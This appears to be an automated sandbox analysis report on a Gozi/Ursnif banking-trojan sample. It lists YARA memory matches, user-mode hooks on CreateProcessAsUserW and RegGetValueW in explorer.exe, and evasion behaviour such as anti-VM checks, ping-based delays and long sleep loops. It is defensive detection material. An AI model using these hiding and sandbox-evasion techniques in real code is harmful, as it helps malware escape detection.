Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFC8BAF521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFC8BAF5200
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\gozi.exe TID: 6140 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe TID: 7076 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540 Thread sleep count: 59 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540 Thread sleep count: 78 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540 Thread sleep count: 41 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540 Thread sleep count: 93 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1304 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2268 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Found evasive API chain (date check)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\cmd.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\gozi.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4982 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4237 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\cmd.exe API coverage: 3.9 %
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5n300s0s.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hscan34n.dll Jump to dropped file
Source: C:\Users\user\Desktop\gozi.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F18409 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 8_2_03F18409
